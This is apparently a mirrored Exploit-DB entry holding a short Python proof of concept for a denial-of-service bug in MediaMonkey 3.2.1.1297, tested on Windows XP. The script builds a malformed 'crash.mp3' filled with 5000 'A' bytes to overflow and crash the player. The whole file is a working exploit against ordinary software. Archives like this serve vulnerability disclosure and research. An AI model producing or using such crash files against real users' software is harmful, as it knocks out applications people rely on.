exploit-db-mirror/exploits/windows/dos/14555.py
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

14 lines
No EOL
268 B
Python
Executable file

#Mediamonkey v. 3.2.1.1297 DOS POC
#vulnerble application link http://www.mediamonkey.com/trialpay
#tested on XP SP2/3
#!/usr/bin/python
filename = "crash.mp3"
junk = "\x41" * 5000
textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()